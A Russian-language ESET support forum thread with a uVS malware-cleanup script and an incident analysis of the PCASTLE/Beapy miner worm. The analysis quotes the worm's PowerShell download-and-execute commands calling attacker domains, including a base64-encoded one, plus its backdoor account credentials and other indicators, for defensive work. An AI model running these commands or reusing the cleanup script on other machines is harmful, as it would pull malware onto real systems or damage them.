ESET CONNECT

[QUOTE]RP55 RP55 написал:
Релиз ESET NOD32 версии 15
Эх...
Раньше на форме бы написали... дали обзор... народ бы обсуждал...[/QUOTE]
что мешает самому опубликовать новость по версии 15

[QUOTE]Ярослав Глушко написал:
[URL=https://cloud.mail.ru/public/1QHL/3xDkyHNFg]https://cloud.mail.ru/public/1QHL/3xDkyHNFg[/URL]
Ссылка на архив с файлами шифрованными и не шифрованными. Просьба помочь с расшифровкой.[/QUOTE]

проверьте архив с файлами. скачивается файл размером 0 байт

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
delhst 0.0.0.0 expire.eset.com
delhst 0.0.0.0 edf.eset.com
;------------------------autoscript---------------------------

delref %SystemDrive%\USERS\JACKA\APPDATA\LOCAL\YANDEX\YANDEXBROWSER­\USER DATA\DEFAULT\EXTENSIONS\NPDPPLBICNMPOIGIDFDJADAMGFKILAAK\9.58_0\SAVEFROM.NET ПОМОЩНИК
deltsk %SystemDrive%\PROGRAM FILES\COMMON FILES\AV\ESET SMART SECURITY 8.0\UPGRADE.EXE
apply

deltmp
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL
delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref %SystemRoot%\SYSWOW64\VID.DLL
delref %SystemRoot%\SYSWOW64\PEERDISTSVC.DLL
delref %SystemRoot%\SYSWOW64\WEVTSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\APPVETWCLIENTRES.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\BTHSERV.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\CSCSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SMBDIRECT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\IE4USHOWIE.EXE
delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\89.0.774.68\MSEDGE.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref BROWSER\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref IRENUM\[SERVICE]
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.153.45\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.147.37\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.102\PSMACHINE_64.DLL
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.151.27\PSMACHINE_64.DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %Sys32%\VAILAUDIOPROXY.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref %SystemRoot%\SYSWOW64\UPDATEDEPLOYMENTPROVIDER.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.153.45\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.147.37\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL
delref %SystemRoot%\SYSWOW64\PERCEPTIONSIMULATIONEXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref %SystemRoot%\SYSWOW64\MAPSCSP.DLL
delref %SystemRoot%\SYSWOW64\LISTSVC.DLL
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\NVENCMFTH264.DLL
delref %SystemRoot%\SYSWOW64\WPCREFRESHTASK.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\NVDECMFTMJPEG.DLL
delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL
delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.102\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_19C79FB6254E3B11\NVENCMFTHEVC.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\ADOBE\ACROBAT READER DC\ACRORD32INFO.EXE
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\GOOGLEUPDATEBROKER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.151.27\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemRoot%\SYSWOW64\WIREDNETWORKCSP.DLL
delref %SystemDrive%\USERS\JACKA\DESKTOP\TOR BROWSER\BROWSER\FIREFOX.EXE
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.

   [QUOTE]Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
   Имя файла POWERSHELL.EXE
   Цифр. подпись Действительна, подписано Microsoft Windows
   Оригинальное имя PowerShell.EXE.MUI
   Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
   Описание Windows PowerShell
   Производитель Microsoft Corporation

   Доп. информация на момент обновления списка
   pid = 5100 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 4724 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:00 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 5496 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:10:00 [2021.09.14]
   Процесс завершен 08:10:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE[/QUOTE]


после включение записи лога DNS стали известны целевые адреса:

[QUOTE] T[.]ZER2[.]COM, V[.]Y6H[.]NET[/QUOTE]

далее, [B]разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам[/B] и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:

[QUOTE]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(\"http://t[.]zer2[.]com/ipc.jsp?h\")"[/QUOTE]

и

[QUOTE]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBtAD8AcwBtAGIAJwApAA==[/QUOTE]

[IMG WIDTH=1176 HEIGHT=405]https://chklst.ru/uploads/editor/z2/2rl2adkha8u7.jpg[/IMG]

после декодирования строки:

[QUOTE]IEX (New-Object Net.WebClient).downloadstring('http://v[.]beahh[.]com/wm?smb')[/QUOTE]

собственно, именно данный целевой адрес и детектировал антивирус:
[QUOTE]10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B[/QUOTE]

родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline

[IMG WIDTH=722 HEIGHT=265]https://chklst.ru/uploads/editor/p9/psquwezo61py.jpg[/IMG]

поиск по известному cmdline позволил определить тип ([URL=https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.PS1.PCASTLE.AF/]Trojan.PS1.PCASTLE[/URL]) и дополнительные детали вредоносного ПО, который распространился в сети:

   The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

[QUOTE] \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}
   \\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\\")''[/QUOTE]

и

   "More advanced options" option to include all hidden files and folders in the search result.

[QUOTE] %Application Data%\sign.txt
   %Application Data%\flashplayer.tmp
   %User Startup%\run.bat
   %User Startup%\FlashPlayer.lnk
[/QUOTE]

данные файлы были найдены в карантине антивируса:

[QUOTE] 7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes

   896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes

   A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes[/QUOTE]


некоторые детали данного червя

некоторые детали:
URLs used by updated worms for infection

http[:]//w.beahh.com/page.html
http[:]//v.beahh.com/

PowerShell URLs:
Note that these are URL fragments, and more information is usually encoded in the query string.

http[:]//v.y6h.net/g
http[:]//v.bddp.net/v
http[:]//v.bddp.net/wm

Domains
Some domains have many subdomains.
For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.

*.beahh[.]com
*.bddp[.]net
v.y6h[.]net
*.zer2[.]com
Scheduled task names:
\Microsoft\Windows\

   Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -> Нет файла <==== ВНИМАНИЕ


Filenames:
%APPDATA%\sign.txt
%APPDATA%\flashplayer.tmp
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk

Listening ports:
65530
65531
65532
65533

TCP traffic on ports:
This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)
65530
65531
65532
65533

Firewall rules:
DNS (allow TCP port 65531)
DNSS2 (allow TCP port 65531)
DNS2 (allow TCP port 65532)
DNSsql (allow TCP port 65533)
DNSd (allow TCP port 65533)
DNSS3 (allow TCP port 65533)

User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”
SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)


детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender
[URL=https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf][B]здесь[/B][/URL]

добавьте несколько зашифрованных файлов и записку о выкупе  в архив и приложите архив в вашем сообщение
+
добавьте образ автозапуска
+
логи FRST
http://forum.esetnod32.ru/forum9/topic2798/

Цитата
Николай Николай написал: Здравствуйте. Eset Internet Security 14.2.24.0 Значок ESET постоянно показывает "Выполняется обновление программы". Почему? Спасибо.

скриншот можете добавить?

4.11.11 - удачный выбор версии uVS с поддержкой Windows 11 :)

[QUOTE] 4.11.11 o Добавлена поддержка Windows 11. 

   Майкрософт поленился сменить версию потому Windows 10 x64 2009 build 22000 = Windows 11.
   Добавлена база известных файлов (km110.x64), пополнена база проверенных, startf я не переписывал и скорее всего не буду, он корректно работает и с базой от 10-ки.[/QUOTE]
+
4.11.12
[QUOTE]o В обработчик BITS добавлен разбор командной строки нотификации. (BITS v1.5+)

o Добавлено автоматическое определение NTFS линков.[/QUOTE]

добавьте образ автозапуска системы. можно из безопасного режима Safe mode

ну, собственно, итог.
отслеживание cmdline по завершенным процессам позволило определить содержание командной строки в контексте powershell, определить тип майнера в локальной сети, и выработать рекомендации по очистке систем, и защите серверов и рабочих станций от метода атаки майнера-червя.

---------------------------------------------------------
4.11.10
---------------------------------------------------------
o Улучшена функция определения внедренного кода.
  Теперь при обнаружении модифицированного кода в процессе (hollowing/dopelganging и т.п.) выдается предупреждение в лог.

o Исправлена ошибка обработки кэша задач, задачи с отсутствующим в реестре CLSID не отображались в списке.